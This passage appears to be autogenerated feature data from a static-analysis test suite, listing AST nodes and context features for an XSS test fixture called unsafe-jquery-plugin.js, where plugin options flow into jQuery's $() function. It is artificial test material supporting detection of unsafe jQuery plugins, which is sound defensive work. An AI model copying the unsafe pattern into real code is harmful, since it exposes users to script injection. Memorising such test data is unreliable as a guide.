f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:2:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:63:2 | $.fn.my ... \\t\\t}\\n\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:63:2 | $.fn.my ... \\t\\t}\\n\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:63:2 | $.fn.my ... \\t\\t}\\n\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:2:63:2 | $.fn.my ... \\t\\t}\\n\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:4:2:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:4:2:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:4:2:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:4:2:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:7:2:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:7:2:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:7:2:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:7:2:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:2:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:2:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:2:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:2:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:19:63:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:28:2:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:28:2:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:28:2:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:28:2:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:2:38:2:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | $(options) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | $(options) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | $(options) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | $(options) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | exceptional return of $(options) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | exceptional return of $(options) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | exceptional return of $(options) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:3:3:12 | exceptional return of $(options) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:5:3:11 | options | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:5:3:11 | options | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:5:3:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:5:3:11 | options | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:5:3:11 | options | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:3:5:3:11 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | $(options.target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | exceptional return of $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | exceptional return of $(options.target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | exceptional return of $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:3:5:19 | exceptional return of $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:18 | options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:18 | options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:18 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:18 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:18 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:5:5:18 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:13:5:18 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:13:5:18 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:13:5:18 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:5:13:5:18 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:15 | isElement | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:15 | isElement | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:15 | isElement | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:15 | isElement | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | exceptional return of isEleme ... target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | exceptional return of isEleme ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | exceptional return of isEleme ... target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | exceptional return of isEleme ... target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | isEleme ... target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | isEleme ... target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | isEleme ... target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:7:7:31 | isEleme ... target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:17:7:23 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:17:7:23 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:17:7:23 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:17:7:23 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:25:7:30 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:25:7:30 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:25:7:30 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:7:25:7:30 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | $(options.target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | $(options.target) | enclosingFunctionName | | +| 